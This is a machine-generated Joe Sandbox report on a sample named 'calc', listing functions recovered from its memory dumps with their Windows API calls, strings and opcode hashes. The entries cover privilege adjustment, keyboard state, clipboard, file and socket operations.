Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ProcessTokenWindows$AdjustCurrentEnumErrorExitLastLookupOpenPowerPrivilegePrivilegesStateSystemValue
String ID: $ $@$SeShutdownPrivilege
API String ID: 3737638738-3163812486
Opcode ID: ea0fbbeac291180e333a6a094d9918e1e1657e0eb019d4086f517d0bf663a25b
Instruction ID: 49d841cba545c5e070391086715d3aefc5c408c91397dada84c5bad0ac2ab89b
Opcode Fuzzy Hash: ea0fbbeac291180e333a6a094d9918e1e1657e0eb019d4086f517d0bf663a25b
Instruction Fuzzy Hash: 9911C171501724FAEB209FA49D8CBEB7EAC9B45382F140462F806D1191E3688DC0C6ED

Function 0043A442 Relevance: 20.5, Strings: 16, Instructions: 542COMMON

Download Yara Rule

Strings

hwnd, xrefs: 0043A642
double, xrefs: 0043A673
ptr, xrefs: 0043A611
long, xrefs: 0043A55D
char, xrefs: 0043A4A5
ubyte, xrefs: 0043A47E
short, xrefs: 0043A4C9
byte, xrefs: 0043A44E
int, xrefs: 0043A575
uint, xrefs: 0043A5AD
dword, xrefs: 0043A515
udword, xrefs: 0043A539
int64, xrefs: 0043A5D3
ushort, xrefs: 0043A4F1
float, xrefs: 0043A65C
uint64, xrefs: 0043A5F9

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID:
String ID: byte$char$double$dword$float$hwnd$int$int64$long$ptr$short$ubyte$udword$uint$uint64$ushort
API String ID: 0-2529698504
Opcode ID: 763c02a2de9db83eade9874e8fbb5dea73bf7cd8866592b9f5a17dbb08c6a031
Instruction ID: 408187dce4e3af08b5b89b5e17c97d7132e6516c7f25d87d376e3bda80f24d10
Opcode Fuzzy Hash: 763c02a2de9db83eade9874e8fbb5dea73bf7cd8866592b9f5a17dbb08c6a031
Instruction Fuzzy Hash: 9502C131D40614ABDB21EF6988417DFB7B1FF09314F1044AFE949BB241D7B89E858B8A

Function 004527E8 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 212timeCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 004527FB

Part of subcall function 0044C6DB: RtlEnterCriticalSection.NTDLL(?), ref: 0044C703

_strlen.LIBCMT ref: 0045286D
_strcat.LIBCMT ref: 0045288A
_strncpy.LIBCMT ref: 004528A3

Part of subcall function 00449C88: __lock.LIBCMT ref: 00449CA6
Part of subcall function 00449C88: RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C6BF,00000000,0045B3A0,00000008,0044C6F4,?,?,?,00449A5F,00000004,0045B068,0000000C), ref: 00449CED

GetTimeZoneInformation.KERNEL32(004675A8,0045BBD8,00000018,00452DFD,0045BBE8,00000008,0044BA23,00000000,?,00436C4F,?,?,00000002,?,00000000), ref: 0045290C
WideCharToMultiByte.KERNEL32(00000000,00000000,004675AC,000000FF,0000003F,00000000,?,?,00436C4F,?,?,00000002,?,00000000), ref: 0045299A
WideCharToMultiByte.KERNEL32(00000000,00000000,00467600,000000FF,0000003F,00000000,?,?,00436C4F,?,?,00000002,?,00000000), ref: 004529CE

Strings

0\F, xrefs: 004528AB, 004529A5, 004529B0
p\F, xrefs: 004529D9, 004529E4, 00452A77, 00452A82

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
String ID: 0\F$p\F
API String ID: 3757401926-1809889677
Opcode ID: a9a2f0f4af91a3ebb07e1ea0307c9db2d8f9e568e724dbbe3797ded2a1e1ba1e
Instruction ID: d2ea11773b2d3be43936d7844425afaec6d5ad34900df3f8f7bdcc1512a1afa4
Opcode Fuzzy Hash: a9a2f0f4af91a3ebb07e1ea0307c9db2d8f9e568e724dbbe3797ded2a1e1ba1e
Instruction Fuzzy Hash: E2711A71904B409ED7259F28EE41B567BE5A716325F64022FE880973A2E7F84C46CB1E

Function 0041510D Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00414E6E: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,0047BD30,?,0040FF5E,?,?), ref: 00414E89

Part of subcall function 00414E55: GetFileAttributesW.KERNEL32(?,00414BDE,?), ref: 00414E59

FindFirstFileW.KERNEL32(?,?), ref: 004151D3
lstrcmpiW.KERNEL32(?,?), ref: 00415293
DeleteFileW.KERNEL32(?), ref: 004152A0
MoveFileW.KERNEL32(?,?), ref: 004152BC
FindNextFileW.KERNEL32(?,00000010), ref: 004152D0
CopyFileW.KERNEL32(?,?,00000000), ref: 004152F0
DeleteFileW.KERNEL32(?), ref: 004152FD
CopyFileW.KERNEL32(?,?,00000000), ref: 0041530B
FindClose.KERNEL32(?), ref: 00415319

Strings

\*.*, xrefs: 00415164, 00415171, 00415191

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: File$Find$CopyDelete$AttributesCloseFirstFullMoveNameNextPathlstrcmpi
String ID: \*.*
API String ID: 2474323978-1173974218
Opcode ID: a36343021f41aea084e20f4c81863218fcec1d7b3d7105e9ed11fc8940d8710d
Instruction ID: aacaddc1c19b48135d35dab2b4c22e42f007f3cfacbae92258d2fd995ae47f3c
Opcode Fuzzy Hash: a36343021f41aea084e20f4c81863218fcec1d7b3d7105e9ed11fc8940d8710d
Instruction Fuzzy Hash: F1512CB290066DEADF21EAA1CC48FCF77BCAF45354F0041D7E509E2141EA799AC8CB65

Function 00424856 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00424874
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00000000), ref: 004248E8
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,00000000), ref: 0042490E
RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042491E
DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 004249AB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004249B6
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004249C1

Strings

:, xrefs: 004248C3
\??\%s, xrefs: 00424890
\, xrefs: 004248AC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
String ID: :$\$\??\%s
API String ID: 3827137101-3457252023
Opcode ID: 1a5f9b6b0c894afbbac53d9d1e736d6b9851742d6e586ddccf845ee95b96f506
Instruction ID: 490b265d1c1b8bc703676836a20bc5cd6847e60d43ef2fc6bf4678178061e1e6
Opcode Fuzzy Hash: 1a5f9b6b0c894afbbac53d9d1e736d6b9851742d6e586ddccf845ee95b96f506
Instruction Fuzzy Hash: 0941A6B650022CAADB10AF64DC49EDB37BCEF48314F5041A6F919D2152DB34DF849BA9

Function 0041111C Relevance: 16.6, APIs: 11, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00411140
GetAsyncKeyState.USER32(00000011), ref: 004111D3
GetKeyState.USER32(00000011), ref: 004111E7
GetAsyncKeyState.USER32(00000012), ref: 00411201
GetKeyState.USER32(00000012), ref: 0041120A
GetAsyncKeyState.USER32(000000A0), ref: 00411225
GetKeyState.USER32(000000A0), ref: 0041122D
GetAsyncKeyState.USER32(000000A1), ref: 0041124F
GetKeyState.USER32(000000A1), ref: 00411257
GetAsyncKeyState.USER32(0000005B), ref: 00411275
GetKeyState.USER32(0000005B), ref: 0041127E

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c338db2ebfc7b81165dcb8171b49bc99007ff0eb5cf1a9d99d3063b8f188d27e
Instruction ID: e31dbba070b44f53dd3458c3638453cf18232ab5b47055628d4a6071834e1978
Opcode Fuzzy Hash: c338db2ebfc7b81165dcb8171b49bc99007ff0eb5cf1a9d99d3063b8f188d27e
Instruction Fuzzy Hash: C241C4341093CD6AEB34DB648949BEBBBD49F55704F04045EDF8D533A2C3788D88976A

Function 00420D89 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 516sleepCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(004783F4), ref: 00420E10
InterlockedDecrement.KERNEL32(004783F4), ref: 00420E21
Sleep.KERNEL32(0000000A), ref: 00420E29
InterlockedIncrement.KERNEL32(004783F4), ref: 00420E30

Part of subcall function 0041FAEE: LoadStringW.USER32(00000066,?,00000FFF,00479E08), ref: 0041FB43
Part of subcall function 0041FAEE: LoadStringW.USER32(0047BD30,?,00000FFF), ref: 0041FB56

InterlockedDecrement.KERNEL32(004783F4), ref: 00420F37
CharUpperBuffW.USER32(?,?), ref: 00420F75
InterlockedDecrement.KERNEL32(004783F4), ref: 0042104E

Strings

@COM_EVENTOBJ, xrefs: 00420F5B, 0042131D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Interlocked$Decrement$IncrementLoadString$BuffCharSleepUpper
String ID: @COM_EVENTOBJ
API String ID: 934844991-2228938565
Opcode ID: d646c18140411800726c90bb1d856db12d7525a8836f33f7ac5f3ec4128abfa3
Instruction ID: 6ea2b9a6e17d07e1c07b5102837ec04bf299e60735082e7939a45b08f099e3a8
Opcode Fuzzy Hash: d646c18140411800726c90bb1d856db12d7525a8836f33f7ac5f3ec4128abfa3
Instruction Fuzzy Hash: 6E229A31A00269DFCB24DF64D881AED37B5FF14304F50816EF915A7262DB38A986CB98

Function 00422C4D Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 210timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00422C7F
FindClose.KERNEL32(00000000), ref: 00422CC5
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00422CF1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00422D05
FileTimeToSystemTime.KERNEL32(?,?), ref: 00422D27

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00422D65
%02d, xrefs: 00422DC2, 00422DCA, 00422DF2, 00422E1A, 00422E42, 00422E6A
%4d, xrefs: 00422D9A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FileTime$FindLocal$CloseFirstSystem
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3238362701-2428617273
Opcode ID: 71ca0f3d555a88e38985b6a51d8b0467d04d6e91d46064fc809aa1ba1af80b67
Instruction ID: b5dcbf70462fbe47fe172edd752ae1c2a7306ae79658aad27f2e11ace563c1bf
Opcode Fuzzy Hash: 71ca0f3d555a88e38985b6a51d8b0467d04d6e91d46064fc809aa1ba1af80b67
Instruction Fuzzy Hash: B47138B2900119ABCB10EBE5D8859EEB3BCAF08314F50415BF915E7241DB78EE458BA8

Function 004230D5 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,75728FB0,?,00000000), ref: 004230F3
FindNextFileW.KERNEL32(00000000,?), ref: 0042314B
FindClose.KERNEL32(00000000), ref: 00423156
FindFirstFileW.KERNEL32(*.*,?), ref: 0042317C
SetCurrentDirectoryW.KERNEL32(?), ref: 004231C9
SetCurrentDirectoryW.KERNEL32(004604D0), ref: 004231E7
FindNextFileW.KERNEL32(00000000,00000010), ref: 004231F1
FindClose.KERNEL32(00000000), ref: 004231FE

Strings

*.*, xrefs: 00423177

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Find$File$CloseCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1688175871-438819550
Opcode ID: dfc8a14a01940d425b0f09de917f9ee571f79e67c6d34d5baa6881ff1d2ea7f7
Instruction ID: 29861fd0da0d17a13f764a0acb193fcdcc356ff7de37d4c9d30fbf1bb77053e7
Opcode Fuzzy Hash: dfc8a14a01940d425b0f09de917f9ee571f79e67c6d34d5baa6881ff1d2ea7f7
Instruction Fuzzy Hash: 5631A9316002297ADF209FA0BD49FFB37BCAF44316F540097F90492181EB7DDE159A18

Function 0041605B Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,0000000E), ref: 004160AD
LoadResource.KERNEL32(?,00000000), ref: 004160B9
LockResource.KERNEL32(00000000), ref: 004160BC
FindResourceW.KERNEL32(?,?,00000003), ref: 004160E1
LoadResource.KERNEL32(?,00000000), ref: 004160EA
SizeofResource.KERNEL32(?,?), ref: 004160F5
LockResource.KERNEL32(00000000), ref: 00416101

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Resource$FindLoadLock$Sizeof
String ID:
API String ID: 4215241788-0
Opcode ID: 2afbcbb99dc1360dcbc8960ad73a9b6ad2de71b7916da34e34b9c8847100ea38
Instruction ID: ad861e728714f87d0bd08c3f0af146d5d0e55425d81be2c55b6ca67d22e84554
Opcode Fuzzy Hash: 2afbcbb99dc1360dcbc8960ad73a9b6ad2de71b7916da34e34b9c8847100ea38
Instruction Fuzzy Hash: F7318B71800219AFEF10DFA0DD48AAF7BBAEB04305F004426F905A2261E375DE60DB69

Function 0042A4F2 Relevance: 10.6, APIs: 7, Instructions: 54clipboardmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?), ref: 0042A524
GlobalLock.KERNEL32(00000000), ref: 0042A531
GlobalUnlock.KERNEL32(00000000), ref: 0042A560
OpenClipboard.USER32 ref: 0042A56C
EmptyClipboard.USER32 ref: 0042A572
SetClipboardData.USER32(0000000D,00000000), ref: 0042A57B
CloseClipboard.USER32 ref: 0042A581

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
String ID:
API String ID: 1677084743-0
Opcode ID: c603adeed05f15c6f61e8f7b7d687119e1396cfb15f998f46e660c351e18ca09
Instruction ID: 6cccff68164277771eb89f088960f801e9b52451248a8bbc4c77ee29cd5c4e6e
Opcode Fuzzy Hash: c603adeed05f15c6f61e8f7b7d687119e1396cfb15f998f46e660c351e18ca09
Instruction Fuzzy Hash: 7401C432104220FFD710BB61EC0DE6F3768AF45726F45046AF80597162DB28CC86CB6A

Function 0042F3BC Relevance: 9.1, APIs: 6, Instructions: 77networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 0042F428
WSAGetLastError.WS2_32(00000000,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F436
bind.WS2_32(00000000,?,00000010), ref: 0042F44E
listen.WSOCK32(00000000,00000005), ref: 0042F45C
WSAGetLastError.WS2_32(00000000,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F46A
closesocket.WS2_32(00000000), ref: 0042F47A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 23d60ec8938c12dcff92dea0958b30484043bd5e484a518ab48403b1d2719e68
Instruction ID: 28023dcdb2f292c3a4eb683a391c007bd58f3907a0e68a2917aa8acad0e77ec9
Opcode Fuzzy Hash: 23d60ec8938c12dcff92dea0958b30484043bd5e484a518ab48403b1d2719e68
Instruction Fuzzy Hash: E1219730700224ABDB10FB65DC42E9F73B5AF10328F90417FF955A7292D778AE458699

Function 00426292 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000001), ref: 004262D4
Sleep.KERNEL32(0000000A,00000000), ref: 00426302
FindNextFileW.KERNEL32(?,?,00000000), ref: 004263DC
FindClose.KERNEL32(?), ref: 004263F4

Strings

*.*, xrefs: 004262B6

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Find$File$CloseFirstNextSleep
String ID: *.*
API String ID: 1749430636-438819550
Opcode ID: 3e8d328fb9d0a0df152669ceac2e35e150d87d91138b84c2d4f04a028453713d
Instruction ID: 14313086ed1824e1ac955e4be02adb7ecbe1729315f12b359723cfbb7ee217a5
Opcode Fuzzy Hash: 3e8d328fb9d0a0df152669ceac2e35e150d87d91138b84c2d4f04a028453713d
Instruction Fuzzy Hash: 8241B031A04229AFDF10EF60EC85AEEBB74FF00324F5541ABE825A2191D779DE45CB58

Function 00414FFA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00414E6E: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,0047BD30,?,0040FF5E,?,?), ref: 00414E89

Part of subcall function 00414E55: GetFileAttributesW.KERNEL32(?,00414BDE,?), ref: 00414E59

FindFirstFileW.KERNEL32(?,?), ref: 00415075
DeleteFileW.KERNEL32(?), ref: 004150D8
FindNextFileW.KERNEL32(00000000,00000010), ref: 004150EB
FindClose.KERNEL32(00000000), ref: 00415101

Strings

\*.*, xrefs: 0041502D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: File$Find$AttributesCloseDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 1127339523-1173974218
Opcode ID: ccb680eb065897f83bf5c081a3fcf52e97192ceb06a48353c20d1d040dc82788
Instruction ID: 409b15486f08223be286d2985c7cc7ce5df5238f831beca23a735b92d1d425b1
Opcode Fuzzy Hash: ccb680eb065897f83bf5c081a3fcf52e97192ceb06a48353c20d1d040dc82788
